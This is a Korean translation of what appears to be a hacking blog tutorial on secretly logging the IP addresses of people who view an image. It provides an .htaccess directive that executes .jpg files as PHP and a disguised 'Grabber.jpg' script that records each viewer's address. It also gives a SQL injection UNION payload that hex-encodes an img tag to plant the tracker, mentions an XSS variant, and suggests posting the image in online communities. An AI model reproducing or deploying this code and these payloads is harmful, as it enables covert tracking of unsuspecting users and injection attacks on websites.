이 튜토리얼에서는 사진을 사용하여 IP 주소를 도용하는 방법을 알아봅니다. 내 생각은 .htaccess 파일을 수정하여 jpg 파일을 PHP 파일로 구문 분석하는 것입니다.
다음은 .htaccess에 추가해야 하는 코드입니다.
AddHandler application/x-httpd-php5 .jpg
그런 다음 다음 코드를 Notepad에 복사합니다. Grabber.jpg
<?php $fh = fopen(‘ip_list.txt', ‘a'); fwrite($fh, $_SERVER[‘REMOTE_ADDR'].” “); fclose($fh); $im = imagecreatefromjpeg(“n00b.png”); header(‘Content-Type: image/jpeg'); imagejpeg($im); imagedestroy($im); ?>
grabber.jpg의 권한을 755로 설정한 다음 다른 사진을 찾아 이름을 n00b.png로 지정하고 같은 디렉터리에 Grabber.jpg와 함께 넣습니다. .
이제 모든 준비가 완료되었습니다. 누군가가 photograbber.jpg를 탐색하면 해당 IP 주소가 기록됩니다.
(번역자 주: 이 내용은 당사 개인 홈페이지 공간에 업로드해야 합니다.)
POC:
(번역자 주: 작성자가 게시한 시연 사진 얻기 모든 분들의 개인정보 보호를 위해 게시하지 않았습니다. 독자들은 작가의 블로그에 가서 볼 수 있습니다.)
이제 사진 작업을 시작할 준비가 되었습니다.
그럼 SQLi를 사용하여 IP 주소를 얻는 방법도 설명하겠습니다. 사실, 사진을 사용하여 IP 주소를 훔치는 것은 매우 빠릅니다. 그러나 독자들이 더 많은 지식을 얻을 수 있도록 설명하겠습니다:
http://leettime .net/sqlninja.com/tasks/basic_ch1.php?id=1′ 조합 선택 1,0x3c696d67207372633d22687474703a2f2f6c65657474696d652e6e65742f6964696f74735f746573745f6c616 22f696d61676569702f7472796d652e6a7067223e,3#
이제 xss를 사용하여 IP 주소를 얻는 방법에 대해 이야기하겠습니다.
http: //leettime.net/xsslab1/chalg1.php?name=&submit=Search
그렇습니다. 그게 다입니다.
이 기술을 사용하면 많은 흥미로운 일을 할 수 있습니다. 실제로 대부분의 커뮤니티에서는 사진 게시를 허용하므로 이 방법을 사용하여 사진에 액세스하는 모든 사람의 IP 주소를 얻을 수 있습니다.
위 내용은 PHP를 기반으로 한 사진을 통해 IP 주소를 얻는 방법에 대해 편집자가 소개하는 내용입니다. 모든 분들께 도움이 되었으면 좋겠습니다!
위 내용은 IP 주소 획득 내용을 포함하여 PHP를 기반으로 사진을 통한 IP 주소 획득 구현을 소개하고 있으니 PHP 튜토리얼에 관심이 있는 친구들에게 도움이 되었으면 좋겠습니다.